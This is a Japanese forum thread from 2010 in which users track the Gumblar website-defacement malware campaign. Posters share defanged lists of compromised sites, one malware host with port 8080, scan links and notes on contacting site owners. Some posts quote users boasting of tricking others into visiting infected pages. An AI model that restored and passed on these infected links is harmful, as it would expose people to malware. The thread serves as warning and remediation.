731 :名無しさん@お腹いっぱい。:2010/05/13(木) 18:52:37
だから、coTLDは関係無いっての

732 :名無しさん@お腹いっぱい。:2010/05/13(木) 18:53:20
×coTLD

○ccTLD

733 :名無しさん@お腹いっぱい。:2010/05/13(木) 18:53:43
このサイトチェッカー役にたたねー
ttp://www.honeywhales.com/

使い方の問題かもしれんが

734 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:11:28
関係ないが、ブラウザゲームサイトの中には、今でもshockwave player必須の所あるから、
心当たりがある奴はうpデートしといたほうがいい。
入れたの忘れてる可能性あるし、うpデートしにいけば、入ってるかどうかわかるし。

735 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:24:25
いちおうShockwavePlayerは自動更新機能あり(デフォで有効)。
ただ常駐しているわけではなくShockwave踏んだ時にチェックが走る模様。

736 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:26:02
>>726
感染したから改竄されたんじゃ。。。>>586,>>702,>>717,>>723

737 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:34:53
YouTubeやニコニコ動画に会員登録してるPCがGumblarに感染したら
勝手に作品とかアップロードされる?
あとOutlookやGMailに迷惑メールもいっぱい来るのだろうか

738 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:49:38
>>737
アップロードはない
そういうものじゃない
スパムメールについてはあるかもしれない

739 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:57:11
>>723
PC初心者さんはサイト運営とかやらんほうがいいよ
http://pc11.2ch.net/test/read.cgi/pcqa/1273597538/68

740 :名無しさん@お腹いっぱい。:2010/05/13(木) 20:59:28
>>738
HP運営してないPCだとFTPじゃなくてサイトとかのID・PW抜かれるのかと思った

ISPからの個人あてメール(請求額等)は削除した方がいいな・・・

741 :名無しさん@お腹いっぱい。:2010/05/13(木) 21:06:27
>>740
ネットワーク上の盗聴はしてるからそういうものは抜かれるよ
下の行についてはどういう意味でそれをするのかよくわからないけどお好みでどうぞ

742 :名無しさん@お腹いっぱい。:2010/05/14(金) 07:02:29
亀かもしれんが
WordPressとかJoomlaとかそういうCMS使ってる?
それなら>>717は多分
http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html
とか
http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/
そんな感じじゃないかな。
多分本人のPCに問題は無いと思う。多分だけど。

743 :名無しさん@お腹いっぱい。:2010/05/14(金) 07:38:25
tp://mobile-apoint.1047.jp/
このサイト、覗くとウイルスに感染するサイトですかね?
確認できる人おねがいします・・・
怖いのでURLの頭2つ消してます。
覗いてから、タスクマネージャが常に100%になって重すぎ状態に・・

744 :名無しさん@お腹いっぱい。:2010/05/14(金) 07:44:16
http://www●hsrc●co●kr

745 :名無しさん@お腹いっぱい。:2010/05/14(金) 07:44:44
>>743
死ね

746 :名無しさん@お腹いっぱい。:2010/05/14(金) 09:08:21
これだけ蔓延しているってことは逆に言えば
チェッカーサイトももっと改ざんを検出してくれるような有用なものが
もう2つか3つくらい出来てもいいのにと思う

そうすれば陥落サイトをここで警告できるのだが

747 :名無しさん@お腹いっぱい。:2010/05/14(金) 09:34:11
ここは鑑定依頼スレではありません
あと専ブラによってはtp://でもURLリンクします
危険URLは.を●にしましょう

総括:PC窓から投げ捨てて氏ね

748 :名無しさん@お腹いっぱい。:2010/05/14(金) 11:23:16
どうしてそんなに千人とか万人の内のふたり三人に構うの?

749 :名無しさん@お腹いっぱい。:2010/05/14(金) 11:26:02
下から三つなんて義務教育の内でも捨てられる階層だよね?
不思議で不思議でしょうがない

750 :名無しさん@お腹いっぱい。:2010/05/14(金) 11:33:08
切り捨てようよ
本当につまらないんだよ

751 :名無しさん@お腹いっぱい。:2010/05/14(金) 12:57:52
Windows Home Server その8
http://pc12.2ch.net/test/read.cgi/win/1268733271

ここによればホームサーバのウィルス対策は個人の自由だそーな

752 :名無しさん@お腹いっぱい。:2010/05/14(金) 13:31:53
>>746
そう思うなら作ればいいじゃない

753 :名無しさん@お腹いっぱい。:2010/05/14(金) 13:32:28
>>742
だね・・・。
>>723は鵜呑みにしてリカバリしてしまったんだろうな(‐人‐)


754 :名無しさん@お腹いっぱい。:2010/05/14(金) 13:48:42
CMS使えるレベルじゃないと思う

755 :コテハン ◆8080adndqg :2010/05/14(金) 14:52:48
【陥落サイトのURL悪用厳禁】
www●netshikoku●com/n-sekisho/ ←絶賛放置中
※fuukei/niitaka/index.htmとか・・・

www●seibidou●jp/products/information_sign/index●html ←ここも絶賛放置中
途中で切れてるけど・・・いちおう

www●contiforce●com/
fourlcp●com/


756 :名無しさん@お腹いっぱい。:2010/05/14(金) 17:22:47
たこ焼き注意
www●hipparidako●net

757 :名無しさん@お腹いっぱい。:2010/05/14(金) 18:19:58
Internet Explorerが毎回「Active Xコントロールやプラグインなどの
ソフトウェアを実行できるようにしますか」と聞いてくるのですが
>>2に従い(1)〜(4)の設定をしてからのように思うのです
ある画面では7回位連続して確認を取りにきます
これをしなくていいようにするにはどうすればいいのでしょうか
皆さん頻繁にOKのクリックをしておられるのですか?

758 :名無しさん@お腹いっぱい。:2010/05/14(金) 18:41:55
http://www.google.co.jp/search?q=Active+X%83R%83%93%83g%83%8D%81[%83%8B%82%E2%83v%83%89%83O%83C%83%93%82%C8%82%C7%82%CC+

759 :名無しさん@お腹いっぱい。:2010/05/14(金) 18:47:43
>>756
二日前にメル凸した方が居る様で
対応済みとたこが言っていました

んだがしかし、rollover.js
ttp://www.virustotal.com/jp/analisis/a46c3abee48dcffe1caa821d705822031c35fe5d97ddd61ca6fcaf40848bde10-1273829143

ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.hipparidako.net%2Findex.html&x=34&y=26
[Gumblarの可能性あり]

760 :名無しさん@お腹いっぱい。:2010/05/14(金) 19:34:04
>>759
Dr.WEBも赤く怒ってました

761 :コテハン ◆8080adndqg :2010/05/14(金) 19:58:54
>>759
rollover●js
function M(){var・・・

passportblues●ru:8080


762 :名無しさん@お腹いっぱい。:2010/05/14(金) 20:15:38
>>757
>>2は関係ありません

763 :名無しさん@お腹いっぱい。:2010/05/14(金) 20:26:04
>>762
そうなんですか…
ありがとうございます

764 :名無しさん@お腹いっぱい。:2010/05/15(土) 01:38:27
www●fukuyama-flowerlc●com
mysta-hair●com/premium/premium_list/

765 :名無しさん@お腹いっぱい。:2010/05/15(土) 02:51:29
つうかIEなんぞ使うなといいたい。

766 :名無しさん@お腹いっぱい。:2010/05/15(土) 03:33:31
なんでだ

767 :名無しさん@お腹いっぱい。:2010/05/15(土) 06:09:42
めんどくさいから。


768 :名無しさん@お腹いっぱい。:2010/05/15(土) 10:03:31
ケイダッシュがまたメンテ中。
またやられたのか。

しかも.htaccessのreplaceの設定が適当なのか、オードリーのページに直接行こうとするとアドレスがイミフなことに。
こんな素人以下のカスweb会社ってあるんだなぁ。

769 :名無しさん@お腹いっぱい。:2010/05/15(土) 11:11:27
>>764
mysta-hair●com/premium/premium_list/も
会社概要にはホームページ作成とある件

770 :名無しさん@お腹いっぱい。:2010/05/15(土) 12:19:04
avastってview-source:付けても反応するんだな。

771 :名無しさん@お腹いっぱい。:2010/05/15(土) 14:07:11
www●jss-ltd●co●jp
www●netshikoku●com/n-sekisho/
www●brand89●com
www●ryu1●co●jp
www●tenkou1●net

772 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:04:00
逆に問いたい、なぜ感染していないの
スクショ系暴露ウイルスの怖さを認識したのが最近、Gumblarなんてその怖さを始めは理解できず、サイトもってないしあんま関係ないわ、こんな感じだった
やってたことと言えばOSのアプデとFirefox+NoscriptでJavaスクリプト切ってたくらい
が、サイトによっては結構ONにしてきたし
アドオンの方は更新頻度もテキトーだったし、AdobeリーダーなんてJavaスクリプトONで使いまくってたし、
今いろいろな設定して使ってることから考えると怖い、感染してないのが不思議だね
感染してないとは思うけどな

773 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:31:05
>感染してないのが不思議だね
>感染してないとは思うけどな

>_<

774 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:35:43
plus1●6●ql●bz
www●arktake●co●jp
www●g-himiko●co●jp

775 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:47:10
規制の巻き添えはもういやナリよ・・・
www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp

776 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:48:25
ぎゃーかぶったー

777 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:52:34
>>773
>< ぺけぽこ

778 :名無しさん@お腹いっぱい。:2010/05/15(土) 18:56:32
かぶった腹いせDA!
i-walker●jp
anime●len2●net

779 :名無しさん@お腹いっぱい。:2010/05/15(土) 19:45:08
>>773
majideそう思うわけ?
きちんと調べるわ

780 :名無しさん@お腹いっぱい。:2010/05/15(土) 19:48:36
>>772
暴露ウィルスはおそらく作者日本人のいたずら

Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
クレジットカードや銀行口座の情報を盗む

ウィルス作者の作成の手腕も全然違うし
性質がそもそも違うので比較しても仕方が無い

781 :名無しさん@お腹いっぱい。:2010/05/15(土) 19:49:47
途中で作ってて送信しちゃった

>Gumblar含め世界的に流行ってるのは某C国のマフィアを始め、
>クレジットカードや銀行口座の情報を盗む
>世界的な凶悪犯罪

782 :名無しさん@お腹いっぱい。:2010/05/15(土) 20:26:28
つまり暗号されてない通信からいろいろ情報を抜かれるけどメールアカウントとか、
でもそれが目的じゃないから、口座やクレジット情報をPCで扱わない人は大丈夫って話?2次感染は防止しななきゃいかんけど
でももうそろそろウイルスの中身解析されたりで、転用がでてきたりするんだろうね

783 :名無しさん@お腹いっぱい。:2010/05/15(土) 20:33:52
感染するのが怖い人はlyumo bookを使おう

784 :名無しさん@お腹いっぱい。:2010/05/15(土) 20:38:55
結論


 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__ 
     |        |        |   | |\_\
     |        | ∧_∧ |   | |  |.◎.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄

785 :名無しさん@お腹いっぱい。:2010/05/15(土) 20:45:52
LiveCDで十分ですよ

786 :名無しさん@お腹いっぱい。:2010/05/15(土) 20:54:42
ここは、これからもPCを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん


787 :名無しさん@お腹いっぱい。:2010/05/15(土) 22:08:05
>>782
メールアカウントはスパム送信に利用されます
ブログアカウントもコメントスパムに利用したり
それぞれ需要はあるのです

788 :名無しさん@お腹いっぱい。:2010/05/15(土) 23:18:31
>>786
ここは、これからもWindowsを使っていく人が、ウイルスの怖さを正しく認識し運用して行くスレ。
わかってない奴がいるのが訳わからん

789 :名無しさん@お腹いっぱい。:2010/05/15(土) 23:46:29
> www●acl-music●jp
これもガンブラーなの?

790 :名無しさん@お腹いっぱい。:2010/05/15(土) 23:53:01
>>789
>>775

791 :名無しさん@お腹いっぱい。:2010/05/16(日) 13:29:13
www●g-himiko●co●jp
www●arktake●co●jp
www●acl-music●jp

メル凸しときました
株式会社アークテイクはjpnic★alpha-web.jp宛なので不安が残る…

792 :名無しさん@お腹いっぱい。:2010/05/16(日) 14:54:04
acl-musicは改ざんされすぎて元がなんだったのかよくわからないな
改ざん具合からしてだいぶ放置されてるようだから大元から止めないとダメだろう
JPCERT/CCにも送っておくわ

793 :名無しさん@お腹いっぱい。:2010/05/16(日) 15:24:53
>>792
ありがと

794 :名無しさん@お腹いっぱい。:2010/05/16(日) 17:03:07
www●yakitori●co●jp/kor/
www●njr●or●jp/m01/07/070405-2/ ←国土交通省関連の公益法人。
Topは改ざんされていないということは、修正漏れ?それにしても公表もしていないとは。。
www●spa-marufuku●com(FRAMEリンク先 park21●wakwak●com/~marufuku/ が感染)
www●3ku●jp
www●isshu●jp/001/470/ ←Topだけ直した?配下は改ざんされたまま
www●ryo-co●net
1excellent●com
楽天市場ショップの制作から運営代行まできめ細かくサポート ホームページ制作のエクセレント
って、またここが製作したページも感染しているのか。。
フォームからも送れないし。

795 :名無しさん@お腹いっぱい。:2010/05/16(日) 20:01:13
祇園大蛇山は>>791の直後に発見、メル凸も済ませてあるけど、
公開連絡窓口のアドレスが死んでたのでカイクリエイツ宛て
メールフォームあるけどaguseGWなしで感染サイトに突撃する勇気は…

【悪用厳禁】
www●marbell●jp
www●any-news●biz :「自己防衛することも重要な世の中ですね」…重要だねorz

796 :名無しさん@お腹いっぱい。:2010/05/16(日) 20:23:59
> www●marbell●jp
確認できないんだけど

797 :名無しさん@お腹いっぱい。:2010/05/16(日) 20:27:52
>>796
gredで覗いてみて

798 :名無しさん@お腹いっぱい。:2010/05/16(日) 22:06:28
www●acl-music●jp
改竄コードの見本市のようだw

799 :コテハン ◆8080adndqg :2010/05/17(月) 10:40:29
【陥落サイトのURL悪用厳禁】
www●children-nepal●net/suryamukhi/handpuppets-j/woodenheadhandpuppets/home●htm
www●3ku●jp/grow_images/2005/june/index_2005june●html ←途中切れ
www●k3●dion●ne●jp/~sym1909 ←途中切れ
www●arktake●co●jp/
www●ryo-co●net/index●html
www●njr●or●jp/m01/07/070706/index●html ←←←
1excellent●com ←←←←ホームページ制作のエクセレント


800 :名無しさん@お腹いっぱい。:2010/05/17(月) 11:41:02
ttp://blogs.yahoo.co.jp/noooo_spam/59869368.html
> 「wwwzuc32.exe」というキーワードでググってみたら、ここ最近
> (先週から?)の「Gumblar.8080」の改ざん攻撃を受けたページの閲覧で
> 発動・感染することになるファイル名のようですな。
へぇー。

801 :名無しさん@お腹いっぱい。:2010/05/17(月) 13:00:34
>>799
> www●k3●dion●ne●jp/~sym1909
・hpbmapscript3.js
http://a001.aguse.jp/images/img/f090685f279c3951cc957f1b963f131250fd6337/555cb0a560a66b7757cd109970789d1ced2d8f64_00_x.jpg
メル凸しときました

【悪用厳禁】
www●kokushiad●jp :Gumblarが入学したようですorz
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.kokushiad.jp

802 :名無しさん@お腹いっぱい。:2010/05/17(月) 13:17:16
ってあれ、国士舘のURLってwww●kokushikan●ac●jpだな
…じゃあここは何?

803 :名無しさん@お腹いっぱい。:2010/05/17(月) 13:30:33
ぐぐったら入試課のものらしい
受験生向けっぽい

804 :名無しさん@お腹いっぱい。:2010/05/17(月) 13:31:15
まちがえた
入学課だった

805 :名無しさん@お腹いっぱい。:2010/05/17(月) 13:37:46
取扱注意
www●fuchucci●or●jp
府中商工会議所

806 :名無しさん@お腹いっぱい。:2010/05/17(月) 14:07:16
>>803
ありがと、URL分けてるのね
そういうことならJPCERTにも報告しておきます

>>805
メールで凸っときました

807 :名無しさん@お腹いっぱい。:2010/05/17(月) 17:20:27
本当、日本は餌食ですなぁ。
一般ユーザーは自動更新ガン無視、未だにIEは6。
web屋はアップデートすると業務に支障きたすとか言ってノーガード。

808 :名無しさん@お腹いっぱい。:2010/05/17(月) 19:53:46
ttp://headlines.yahoo.co.jp/hl?a=20100517-00000027-zdn_n-sci
>世界ブラウザ市場で、IE6は17.58%のシェアを持ち、2位に付けている

何も日本に限ったことではなさそうな…って2位かよ

809 :名無しさん@お腹いっぱい。:2010/05/17(月) 20:28:21
IE7人気ないんだなあ…

810 :名無しさん@お腹いっぱい。:2010/05/17(月) 20:47:45
IE7にしがみつく理由が何一つ無いからねぇ。
2000とかMeとか→IE6で終わり
XPとかVistaとか→IE8にできる

811 :名無しさん@お腹いっぱい。:2010/05/17(月) 21:00:03
>>810
そうでもないぞ
低スペックPCではIE7の方が8より軽い

812 :名無しさん@お腹いっぱい。:2010/05/17(月) 21:24:20
IE8で増えた余計な機能(Webスライスやアクセラレータ)切れば変わらん、むしろ快適。

813 :名無しさん@お腹いっぱい。:2010/05/17(月) 21:39:18
2000とかもうサポート終わるOSをネットに繋ぐとか信じられん

814 :名無しさん@お腹いっぱい。:2010/05/17(月) 21:43:29
こないだ母校の高校行ったらまだ2000使ってたしセキュリティソフト何も入ってなかった

815 :名無しさん@お腹いっぱい。:2010/05/17(月) 21:54:41
会社出使ってるN○Cのグループウェアが、対応ブラウザIE6のみとか寝言ほざいてるな

ActiveX使いまくりで、Firefox、Chrome等当然未対応
AD環境だったから、導入時にいちいちAdministrators権限持ちのユーザで
モジュール毎にActiveX入れて回らなければならないとか糞だった

しかも、よくわかってないのか
「スクリプトを実行しても安全だとマークされていないActiveX〜〜」にチェックつけろとか
インストール手順書が回ってくるし

こういう連中がGumblar流行の助長してるんだろうな

816 :名無しさん@お腹いっぱい。:2010/05/17(月) 22:42:49
OSがくそなだけ

817 :名無しさん@お腹いっぱい。:2010/05/17(月) 23:46:29
などと意味不明の供述を繰り返しており

818 :名無しさん@お腹いっぱい。:2010/05/18(火) 00:02:08
実は意味がある言葉である。

819 :名無しさん@お腹いっぱい。:2010/05/18(火) 01:08:16
>>815
もちろんIE6はそのグループウェア専用にしてるんだよね?
普段はFirefoxxやOperaでYahooとか見てるんだよね?


820 :名無しさん@お腹いっぱい。:2010/05/18(火) 01:14:49
IE6のモジュールがあるだけで脆弱(ry

821 :名無しさん@お腹いっぱい。:2010/05/18(火) 01:50:27
奥の手はあるけど現実的じゃないからなー
ttp://blog.livedoor.jp/blackwingcat/

822 :名無しさん@お腹いっぱい。:2010/05/18(火) 13:37:37
テンプレ案、詰めなくていいの?
何を残すとか何を削るとか毎度揉めてるみたいだけど

823 :名無しさん@お腹いっぱい。:2010/05/18(火) 13:52:15
揉めるから敢えて触れなかったのに

824 :名無しさん@お腹いっぱい。:2010/05/18(火) 14:27:57
今なら>>2のAdobe Readerの推奨設定にLaunch Actionやマルチメディア操作の無効化を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2211
ここのとかまるまるコピペで加えるだけでいいんじゃないかな。

825 :名無しさん@お腹いっぱい。:2010/05/18(火) 14:46:17
>>768
ケイダッシュのホスティングしてる大塚商会も問題有りだな。
気休めにこれぐらいしてやったらいいのに。

<Limit ALL>
Order Allow,Deny
Allow from alpha-prm.jp
Deny from all
</Limit>

826 :名無しさん@お腹いっぱい。:2010/05/18(火) 16:32:01
刃物に注意
www●hamonoichiba●com
金券ショップも注意
www●access-ticket●com

改ざんされてる通販サイトは廃業しろよ…

827 :名無しさん@お腹いっぱい。:2010/05/18(火) 17:59:53
www●access-ticket●com


828 :名無しさん@お腹いっぱい。:2010/05/18(火) 18:13:27
www●access-ticket●comの社長のtwitter
ttp://twitter●com/access_kun
@2ちゃんって何?
ネラーなの?


829 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:11:39
>>828
このクズにサイトがウイルスばらまいてるって教えてやれよ

830 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:23:27
>>826
確認出来ない

831 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:29:26
キッティング屋だけど

地方自治体、政府関係あたりは特に
WindowsUpdateの警告出すな
ウィルス対策ソフトの警告出すな
Adobe ReaderやFlash、JREが勝手にアップデートして
システムが動かなくなったらどうするんだ
自動アップデート切れとか言ってくる

自治体や政府こそ危ない
これが日本政府の現実

832 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:29:33
>>826-828
Gumblar/8080 Not Found.

おい。

833 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:48:59
ここで晒された嫌がらせかもしれない
http://tsushima.2ch.net/test/read.cgi/news/1273995935/168-182


834 :名無しさん@お腹いっぱい。:2010/05/18(火) 19:49:41
>>832
修正されたようだな
17:44の時点ではJSの中にあった

835 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:08:43
>>826
www●hamonoichiba●com
確認の後電凸完了

www●access-ticket●com
確認の後電凸完了
ここは、別の方が12時頃に電凸があったと言っていた
サーバー会社とHP作成会社に調査依頼をかけた結果が
たた今届き、15日に改竄があったとのこと

836 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:25:32
>>835
電凸乙

837 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:27:29
>>831
てっぺんからしてこんなんだから
そりゃ自衛隊の情報流出も起きるわ
嗚呼F-22配備の夢……

838 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:30:00
>>837
それは別の問題だろ

839 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:46:46
F-22配備するくらいならその金でOS入れ替えたりセキュリティソフト入れたりIE他をアップデートした方がよっぽど防衛力上がりそう

840 :名無しさん@お腹いっぱい。:2010/05/18(火) 21:13:23
【悪用厳禁】
www●crossmarin●net :またWEB屋かorz

841 :名無しさん@お腹いっぱい。:2010/05/18(火) 21:51:36
>>840
電凸完了

こんな時間に電話をかけてくるのは失礼でしょう、だとw
だがしかし、伝える事はつたえた
理解したかは知らん

サーバー会社と私が悪者らしいw
アホや

842 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:07:28
>>841
お疲れ様でした
メンテに変わりました

843 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:31:55
NASサーバー/ファイルサーバーの奨め
www●nas-server●info/
ここも感染してる?


844 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:37:08
>>843
してる

845 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:44:36
>>844
サンクス
モロゾフ以来に久しぶりに踏んだよ


846 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:45:31
さっきMSEが"VirTool:JS/Obfuscator.M"検出したけどGumblar?
検索しても英語ばかりで詳細分からなかった

847 :名無しさん@お腹いっぱい。:2010/05/18(火) 22:47:16
>>843
ttp://www.virustotal.com/jp/analisis/fff384343e645c279bd61ae9fc89fcdae27dc02e79ffeb3db86deefa3a2c8a59-1274190254
ttp://www.aguse.jp/?m=w&url=www.nas-server.info%2F&x=24&y=17
[Gumblarの可能性あり]

848 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:05:12
ubuntunの俺は問題ない
高みのけんぶつだわ

849 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:05:57
:8080/が無い最新型を探してるんだが・・
み つ か ら な い o r z

850 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:28:34
>>843
ここは鑑定スレじゃない事を忘れずに

>>848
誰がうまいこと言えと

851 :コテハン ◆8080adndqg :2010/05/18(火) 23:32:58
【陥落サイトのURL悪用厳禁】
www●ryu1●co●jp/
www●ftagent●jp ←傑作w

><p>現在、本サイトはメンテナンスを行っております</p>
><p>改めてアクセスをお願いいたします </p>

<script>KO={x:false};this.RO=・・・

www●any-news●biz/ ←Web・インターネット・SEO系ニュース

852 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:38:09
>>843-847
(略).info/info/2010/05/post_2.php
>パソコンが不調です。
>私のもいまいち動きが鈍いですが、同僚さんのPCがついに壊れてしまいました。
>うんともすんとも言わない状況。

これはひょっとして笑うところか?

853 :843:2010/05/18(火) 23:39:51
>>850
すまんかった
以後気をつける

854 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:40:50
server●crossmarin●net :found
 → www●crossmarin●net :found
 → temp●crossmarin●net :found
 → han●crossmarin●net :found

どうにもならねえやwww

855 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:42:45
>>852
>PCがついに壊れてしまいました

windowsが起動しないだけってオチカ?

856 :名無しさん@お腹いっぱい。:2010/05/18(火) 23:47:18
って、>>841がわざわざ電凸してくれてるー!
申し訳ない、厭な思いをさせちゃったうえにこんな結果だったみたいだ…

857 :815:2010/05/19(水) 00:23:34
ここまで来ると笑いが止まらんwwww
感染者発生wwww
あばばばば


>>819
おじさん連中はみんな、ブラウザ=IEと思ってるよ

俺は余裕でIE8ぶっこんだ
普通に動いたんだけどね

858 :名無しさん@お腹いっぱい。:2010/05/19(水) 00:42:55
>>857
Nのグループウエアって星の事務所かな?
最新版は、IE8も桶だね。
でも簡単にバージョンアップできるものでもないけどね。
カスタマイズしてたら特にね。


859 :名無しさん@お腹いっぱい。:2010/05/19(水) 00:45:58
脅し?

101 :名無しさん@ビンキー:2010/05/19(水) 00:25:11 0
>>96
ウナちゃんもこのままだと同じ末路になる
http://www.nas-server.info/

ひでぇと思ったwwwwwwwwwwwwwwww


189 :斎藤智成 ◆LIuJMgzRRY :2010/05/19(水) 00:43:51 0
そろそろネタ晴らし(てかさっきからしてるのに誰も気づかない馬鹿ばかりなので)
>>101は俺でした。そして最新の危険ウィルスだから検知できないよ。
嘘だと思ったらURLをぐぐってみろ

まーそんなわけでコンビニいく
帰ってきたら生放送するから
サイちゃんでタグ検索してね

860 :858:2010/05/19(水) 00:48:28
>>831
>自動アップデート切れとか言ってくる

うちの会社もアップデートきってる。
ユーザからソフトのインストール権限奪ってるし、Adminでは、プロキシ設定をわざとしていないから
自動アップデートが動いてもダウンロードできないから。

ちなみにIEは6。親会社のシステムがIE6でないといけないから。7と8はダメとなっているから。


861 :名無しさん@お腹いっぱい。:2010/05/19(水) 00:50:45
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

862 :名無しさん@お腹いっぱい。:2010/05/19(水) 00:51:05
nas-server●info/
avast!対応はやっっ

863 :名無しさん@お腹いっぱい。:2010/05/19(水) 08:03:48
>>862
そこはここに出る前から対応してた(JS:Illredir-BU,5/14に対応)
昨日検知しなかった奴も検体送っといたら今日の分(JS:Illredir-BX,5/18の2本目)で対応してくれた
ありがたやありがたや

864 :名無しさん@お腹いっぱい。:2010/05/19(水) 11:49:52
やっぱりOSやブラウザ、セキュリティソフトみたいな重要なものは強制アップデートすべきだな
MSはWindows8からは自動更新は強制アップデートしろ
でもってサポ切れOSはネット繋げなくなるようにしてしまえばいい

865 :名無しさん@お腹いっぱい。:2010/05/19(水) 12:49:01
んなことしたら企業向けには売れないOSになるな
大半の企業は8をパスして7のProかEnterpriseを2020年まで使うことになるだろう

866 :名無しさん@お腹いっぱい。:2010/05/19(水) 13:03:48
アメリカの公的機関のドメインの.govはマカフィーの安全なドメイン調査で一位だったけど
やっぱり向こうはちゃんと対策してて絶対安全くらいのレベルなのかな?
日本は公的機関も普通に陥落してるが

867 :名無しさん@お腹いっぱい。:2010/05/19(水) 13:35:42
そりゃ日本は政府関係のPCにWin使ってる間抜けだからなあ

868 :コテハン ◆8080adndqg :2010/05/19(水) 13:46:12
【陥落サイトのURL悪用厳禁】
maillady●hirotu●net/
suncs●sakura●ne●jp/ ←吹いたw
tengas155●coreserver●jp/


869 :名無しさん@お腹いっぱい。:2010/05/19(水) 14:04:07
>>867
OS云々より教育をしてないからだな
P2P使うバカも後を絶たないし

870 :名無しさん@お腹いっぱい。:2010/05/19(水) 14:07:54
> tengas155●coreserver●jp/


871 :名無しさん@お腹いっぱい。:2010/05/19(水) 14:18:10
どうやって見つけてきてるの?

872 :名無しさん@お腹いっぱい。:2010/05/19(水) 15:41:30
五感をフルに働かせて

873 :コテハン ◆8080adndqg :2010/05/19(水) 16:23:37
>>870
●が家出してたorz
tenga●s155●coreserver●jp/


874 :名無しさん@お腹いっぱい。:2010/05/19(水) 20:48:14
Gumblar被害も10分以内に把握、at+linkが「改竄チェッカー」提供
ttp://internet.watch.impress.co.jp/docs/news/20100519_367965.html
改竄チェッカー
ttp://www.at-link.ad.jp/service/option/security/falsification/

たけーよ

875 :名無しさん@お腹いっぱい。:2010/05/19(水) 21:25:10
www●biz-x●jp ←ここに申告ができない
diet-sango●jp/info/
tw13●net

876 :名無しさん@お腹いっぱい。:2010/05/19(水) 21:54:54
msconfigのスタートアップで感染確認云々はもう無効?

877 :名無しさん@お腹いっぱい。:2010/05/19(水) 22:04:46
全く意味がないです

878 :815:2010/05/19(水) 22:16:44
>>858
です
カスタマイズ入ってるなぁ

>>876
Gumblar.Xの時点ですでにドライバ型になってたはず

879 :名無しさん@お腹いっぱい。:2010/05/19(水) 22:36:12
>>878
Cドライブフォルダやレジストリエディタの確認でも見当たらないのか 厄介だ

880 :名無しさん@お腹いっぱい。:2010/05/19(水) 23:36:13
LiveLeak.comにうじゃうじゃありそうですね

881 :名無しさん@お腹いっぱい。:2010/05/20(木) 01:15:38
>>879
レジストリでもデバイスドライバ関係のレジストリ読める人には確認できると思う


HKLM\Software\Microsoft\Windons\CurrentVersion\Run
だっけ?

今のはこんな所探しても見つからない

882 :名無しさん@お腹いっぱい。:2010/05/20(木) 02:49:43
>>881
こっちも確認しないと
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

883 :名無しさん@お腹いっぱい。:2010/05/20(木) 03:30:24
>>879
おとなしくスキャンしてください

884 :(VдV) ◆yUyb3Tqn92 :2010/05/20(木) 05:04:13
(VдV)v ニコニコ生放送スレでウィルス踏んだゴミどもみてるー?笑

885 :(VдV) ◆yUyb3Tqn92 :2010/05/20(木) 05:05:06
ウフン v(Vд^)−☆ おやすみ!OS再インスコ頑張れお☆

886 :名無しさん@お腹いっぱい。:2010/05/20(木) 05:10:49
顔文字・・・
またお前が斎藤を嗾けたのか

887 :名無しさん@お腹いっぱい。:2010/05/20(木) 07:54:51
RunOnceも見ないとダメだろ

888 :名無しさん@お腹いっぱい。:2010/05/20(木) 08:34:21
>>882
だからそんな所見てもしかたないって

889 :名無しさん@お腹いっぱい。:2010/05/20(木) 08:34:57
>>885
君がやってたウィルス配布BBS消えてたけど移転した?
検索しても出ないんだが

890 :名無しさん@お腹いっぱい。:2010/05/20(木) 09:44:16
その顔文字普通に通報していいレベルなんじゃね

891 :名無しさん@お腹いっぱい。:2010/05/20(木) 12:03:41
>>884
誰も気にしないよネット弁慶とか

892 :名無しさん@お腹いっぱい。:2010/05/20(木) 13:50:49
(VдV) ◆yUyb3Tqn92の人間像

ttp://aaabbbccc.s6.x-beat.com/upload/src/up33522.jpg

